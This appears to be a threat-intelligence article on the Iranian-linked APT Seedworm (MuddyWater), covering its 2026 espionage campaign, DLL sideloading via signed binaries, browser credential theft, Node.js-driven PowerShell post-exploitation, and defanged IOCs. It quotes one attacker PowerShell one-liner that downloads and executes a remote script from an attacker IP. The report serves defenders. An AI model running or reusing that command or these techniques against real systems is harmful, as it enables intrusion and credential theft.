Seedworm’s Evolution: Inside the Iranian-Linked APT’s Surgical Global Espionage Push
The advanced persistent threat (APT) group known as Seedworm—also identified by the monikers MuddyWater, Temp Zagros, and Static Kitten—has long been linked to the Iranian Ministry of Intelligence and Security (MOIS). Recent intelligence reveals that the group has significantly matured its operational tradecraft, launching a sophisticated global espionage campaign designed to bypass modern endpoint detection and response (EDR) systems.
This campaign has successfully breached at least nine distinct organizations across four continents. The targeting profile is highly surgical, impacting critical sectors including industrial manufacturing, financial services, aviation, government, and academia.
Notable victims include a prominent South Korean electronics manufacturer, a Middle Eastern aviation hub, and several strategic entities throughout Southeast Asia and Latin America. The objective is unmistakably clear: the exfiltration of high-value intellectual property, sensitive governmental intelligence, and strategic access to downstream supply chain partners.
According to detailed analysis by Symantec security researchers, the campaign was observed in early 2026. The group’s primary method of evasion involves the abuse of cryptographically signed binaries to perform DLL sideloading, effectively “hiding in plain sight” by utilizing legitimate software to execute malicious code.
The Mechanics of Binary Abuse and Sideloading
To evade signature-based defenses and blend into standard system telemetry, Seedworm leverages trusted executables to load weaponized Dynamic Link Libraries (DLLs). By using binaries that carry valid digital signatures, the attackers ensure that traditional security tools view the process execution as legitimate activity. A particularly deceptive aspect of this campaign is the targeting of security vendor binaries, which can complicate incident response workflows.
The primary vectors identified include:
- fmapp.exe (Fortemedia): Weaponized to load the malicious
fmapp.dll. - sentinelmemoryscanner.exe (SentinelOne): Exploited to load
sentinelagentcore.dll.
Once these malicious DLLs are resident in memory, they deploy a specialized tool dubbed ChromElevator. This utility is specifically engineered to scrape sensitive data from Chromium-based browsers, including stored credentials, session cookies, and financial information.
Orchestration via Node.js and Modular Payloads
A significant evolution in Seedworm’s technical repertoire is the shift toward Node.js orchestration. Rather than relying solely on standard Windows processes, the attackers utilized Node.exe as a central parent process to manage DLL sideloading and the execution of various scripts. This provides a layer of abstraction that can decouple malicious intent from the actual payload execution.
The Node.js-based implant acts as a delivery vehicle for modular PowerShell scripts, which perform a range of post-exploitation tasks:
- System Reconnaissance: Rapidly mapping the environment using
whoami,hostname, and domain queries. - Visual Surveillance: Capturing screenshots of active user sessions to gauge high-value activity.
- Credential Harvesting: Extracting the SAM, SECURITY, and SYSTEM registry hives to facilitate offline cracking.
- Persistence & Pivoting: Establishing SOCKS5 reverse proxy tunnels to provide a stable, encrypted foothold for lateral movement.
Attackers frequently utilized one-liners to pull remote scripts, such as:
powershell -NoProfile -Command “iex (New-Object Net.WebClient).DownloadString(‘http://179.43.177[.]220:8080/nm.ps1’)”
Beyond basic script execution, the group employed advanced techniques to escalate privileges. One tool leveraged the Windows API CredUIPromptForWindowsCredentialsW to present users with a legitimate-looking credential prompt. Furthermore, the attackers demonstrated a deep understanding of Windows authentication by abusing Kerberos delegation via GSS-API to extract Ticket Granting Tickets (TGTs), allowing them to move through the network without needing plaintext passwords.
Exfiltration Tactics: Blending with Web Traffic
To avoid detection by network-layer security monitoring (such as DLP or NTA), Seedworm abandoned custom command-and-control (C2) infrastructure in favor of legitimate public services. They utilized sendit[.]sh, a public file-sharing platform, to exfiltrate stolen data. By routing exfiltration through high-reputation domains, the group significantly reduces the likelihood of triggering alerts based on anomalous outbound traffic.
Case Study: The South Korean Intrusion
The lifecycle of the intrusion into the South Korean manufacturer provides a blueprint of Seedworm’s operational discipline. The breach began on February 20, 2026, starting with automated reconnaissance via Node.js. Within minutes of initial access, the attackers had already captured screenshots and begun the payload download phase. Following DLL sideloading and the establishment of persistence via registry run keys, the group maintained a presence for over a week. Unlike “smash-and-grab” attackers, Seedworm operated with measured intervals—interspersing active data theft with quiet periods to mimic automated beaconing, concluding their primary phase around February 27.
Indicators of Compromise (IOCs)
| File Indicators (SHA-256) | Network IOCs |
|---|---|
| e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b – fmapp.exe | 179.43.177[.]220 |
| c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde – fmapp.dll | 178.128.233[.]36 |
| 128b58a2a2f1df66c474094aacb7e50189025fbf45d7cd8e0834e93a8fbed667 – sentinelmemoryscanner.exe | 172.67.156[.]47 |
| 0c9b911935a3705b0ad569446804d80026feb6db3884aeb240b6c76e9b8cf139 – sentinelagentcore.dll | 104.21.48[.]205 |
| 74ab3838ebed7054b2254bf7d334c80c8b2cfec4a97d1706723f8ea55f11061f – Privilege escalation tool | timetrakr[.]cloud |
| 3ee7dab4ae4f6d4f16dfabb6f38faef370411a9fc00ff035844e54703b99600a – SAM hive extractor | 37.187.78[.]41 |
| bee79c3302b1a7afc0952842d14eff83a604ef00bfdae525176c16c80b2045f7 – SAM hive extractor | 34.117.59[.]81 |
| d587959841a763669279ad831b8f0379f6a7b037dffc19deab5d41f37f8b5ffc – Credential harvester | sendit[.]sh |
| b21c802775df0c0d82c8cfde299084abc624898b10258db641b820172a0ba29a – Socks5 proxy tool | http://179.43.177[.]220:8080/nm.ps1 |
| http://179.43.177[.]220:8080/a.dat | |
| http://179.43.177[.]220:8080/a.exe | |
| http://ipinfo[.]io/json | |
| https://svc.wompworthy[.]com |
Security Advisory: IP addresses and domains have been defanged (e.g., [.]) to prevent accidental execution or automated ingestion. Analysts should only “re-fang” these indicators within isolated threat intelligence platforms such as MISP, VirusTotal, or a dedicated SIEM environment.